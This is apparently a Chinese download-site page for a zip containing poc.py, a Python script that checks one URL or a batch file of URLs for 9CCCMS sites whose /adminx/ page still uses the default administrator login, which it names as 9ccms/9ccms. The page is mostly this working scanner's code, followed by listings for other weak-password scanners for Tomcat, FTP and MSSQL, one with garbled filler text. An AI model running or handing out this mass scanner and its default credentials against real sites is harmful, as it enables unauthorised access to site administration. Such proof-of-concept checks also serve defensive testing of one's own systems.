• a1098346640
    了解作者
  • Python
    开发工具
  • 1.3KB
    文件大小
  • zip
    文件格式
  • 0
    收藏次数
  • 5 积分
    下载积分
  • 0
    下载次数
  • 2022-05-28 19:37
    上传日期
漏洞名称:9CCCMS 弱口令 功能:单个检测,批量检测 单个检测:python poc.py -u url 批量检测:python poc.py -f 1.txt
久草CMS.zip
  • 久草CMS
  • poc.py
    2.4KB
内容介绍
#!/usr/bin/env python # -*- coding:utf-8 -*- import time import requests import os from requests.sessions import session os.system('') from requests.packages.urllib3.exceptions import InsecureRequestWarning # 禁用安全请求警告 requests.packages.urllib3.disable_warnings(InsecureRequestWarning) import argparse class poc(): def title(self): print(''' +-----------------------------------------------------------------+ 漏洞名称:9CCCMS 弱口令 功能:单个检测,批量检测 单个检测:python poc.py -u url 批量检测:python poc.py -f 1.txt +-----------------------------------------------------------------+ ''') def poc(self, target_ur): url = f'{target_ur}/adminx/' headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'} try: res = requests.get(url=url, headers=headers,verify=False,timeout=10) return res except Exception as e: print("\033[31m[x] 请求失败 \033[0m", e) def main(self, target_url, file): self.title() count=0 if target_url: res=self.poc(target_url) if res.status_code==200 and "当前使用的是默认账号" in res.text: print(f'\033[31m[+] {target_url} 存在弱口令:9ccms/9ccms \033[0m') if file: for url in file: count += 1 target_url = url.replace('\n', '') #取消换行符 #time.sleep(1) res=self.poc(target_url) try: if res.status_code==200 and "当前使用的是默认账号" in res.text: print(f'\033[31m[{count}] 响应值为200,{target_url} 存在弱口令:9ccms/9ccms\033[0m') else: print(f'[{count}] 响应值为{res.status_code},{target_url} 不存在弱口令') except Exception as e: print("\033[31m[x] 请求失败 \033[0m", e) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-u','--url',type=str,default=False,help="目标地址,带上http://") parser.add_argument("-f",'--file', type=argparse.FileType('r'),default=False,help="批量检测,带上http://") args = parser.parse_args() run = poc() run.main(args.url, args.file)
评论
    相关推荐
    • 弱口令扫描工具
      扫描服务器,Apache Tomcat 后台弱口令扫描.同时也可以扫路由器``用法很简单``添加IP地址段就可以进行扫描
    • 弱口令扫描弱口令获取远程服务器
      弱口令获取远程服务器随心¥邪神VIP1433弱口令扫描
    • Tomcat弱口令扫描
      弱口令扫描的工具有很多中,而在这其中,比较优秀的一款就是Tomcat,用起来很方便。希望上传给大家共享,也为了以后自己方便查找。
    • ftp扫描弱口令是弱口另
      dfgdgdfgftp扫描山苍子才撒地方志十分上是发生甚至事实
    • Tomcat弱口令扫描工具
      Tomcat弱口令扫描工具,可自己写字典进行爆破。
    • 1433强大弱口令扫描
      说明: 1.无回显猜解,结果及时保存,猜解过程不会卡死. 2.论少量字典的猜解速度,它赶不上X-Scan,H-Scan... 3....猜解7万字典而不卡死的软件.包括雪落的极速弱口令探测器,太阳联盟破解的 PPScan,以及X-Scan,H-Scan等等.
    • ftp弱口令扫描工具
      十分好用的,多线程ftp弱口令扫描工具。无毒
    • 极速MSSQL弱口令扫描
      扫描漏洞扫描漏洞扫描漏洞扫描漏洞扫描漏洞扫描漏洞扫描漏洞扫描漏洞扫描漏洞扫描漏洞扫描漏洞扫描漏洞扫描漏洞扫描漏洞扫描漏洞扫描漏洞扫描漏洞扫描漏洞扫描漏洞扫描漏洞扫描漏洞扫描漏洞扫描漏洞扫描漏洞扫描漏洞...
    • ftp探测 扫描FTP弱口令
      ---------------------------------------------------根据百度搜索获取网站地址 然后扫描FTP弱口令! ftp_pass.txt 里可以自己修改字典! 本程序为技术交流使用 不可用于非法用途--------------------------------...
    • FTP弱口令快速扫描
      FTP弱口令快速扫描,可以快速扫描IP内存在FTP弱口令的IP并整理。